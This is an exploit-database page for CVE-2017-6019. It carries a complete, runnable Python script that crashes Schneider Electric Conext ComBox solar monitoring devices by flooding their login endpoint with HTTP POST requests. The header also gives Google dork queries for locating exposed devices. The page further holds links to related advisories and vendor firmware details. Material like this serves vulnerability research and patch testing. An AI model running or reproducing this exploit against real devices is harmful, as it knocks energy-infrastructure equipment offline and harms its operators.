Lucene search
K

Conext ComBox 865-1058 - Denial of Service Exploit

🗓️ 06 Mar 2017 00:00:00Reported by Mark LiapustinType 
zdt
 zdt
🔗 0day.today👁 34 Views

Conext ComBox Denial of Service Exploit causing self-reboo

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2017-6019
2 Mar 201700:00
circl
CNVD
Schneider Electric Conext ComBox Denial of Service Vulnerability
3 Mar 201700:00
cnvd
CVE
CVE-2017-6019
7 Apr 201722:00
cve
Cvelist
CVE-2017-6019
7 Apr 201722:00
cvelist
Exploit DB
Conext ComBox 865-1058 - Denial of Service
2 Mar 201700:00
exploitdb
exploitpack
Conext ComBox 865-1058 - Denial of Service
2 Mar 201700:00
exploitpack
ICS
Schneider Electric Conext ComBox
2 Mar 201700:00
ics
NVD
CVE-2017-6019
7 Apr 201722:59
nvd
OSV
CVE-2017-6019
7 Apr 201722:59
osv
Packet Storm
Conext ComBox 865-1058 Denial Of Service
5 Mar 201700:00
packetstorm
Rows per page
#Exploit Title: Conext ComBox - Denial of Service (HTTP-POST)
#Description: The exploit cause the device to self-reboot, constituting a denial of service.
#Google Dork: "Conext ComBox" + "JavaScript was not detected" /OR/ "Conext ComBox" + "Recover Lost Password"
#Date: March 02, 2017
#Exploit Author: Mark Liapustin & Arik Kublanov
#Vendor Homepage: http://solar.schneider-electric.com/product/conext-combox/
#Software Link: http://cdn.solar.schneider-electric.com/wp-content/uploads/2016/06/conext-combox-data-sheet-20160624.pdf
#Version: All firmware versions prior to V3.03 BN 830
#Tested on: Windows and Linux
#CVE: CVE-2017-6019
 
# Use this script with caution!
# Mark Liapustin: https://www.linkedin.com/in/clizsec/
# Arik Kublanov: https://www.linkedin.com/in/arik-kublanov-57618a64/
# =========================================================
import subprocess
import os
import sys
import time
import socket
# =========================================================
 
print 'Usage: python ComBoxDos.py IP PORT'
print 'Number of arguments:', len(sys.argv), 'arguments.'
print 'Argument List:', str(sys.argv)
 
print "ComBox Denial of Service via HTTP-POST Request"
global cmdosip
cmdosip = str(sys.argv[1])
port = int(sys.argv[2])
print "[!] The script will cause the Conext ComBox device to crash and to reboot itself."
         
print "Executing...\n\n\n"
for i in range(1, 1000):
  try:
    cmdosdir = "login.cgi?login_username=Nation-E&login_password=DOS&submit=Log+In"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((cmdosip, port))
    print "[+] Sent HTTP POST Request to: " + cmdosip + " with /" + cmdosdir + " HTTP/1.1"
    s.send("POST /" + cmdosdir + " HTTP/1.1\r\n")
    s.send("Host: " + cmdosip + "\r\n\r\n")
    s.close()
  except: 
     pass

#  0day.today [2018-04-11]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Mar 2017 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.20502
34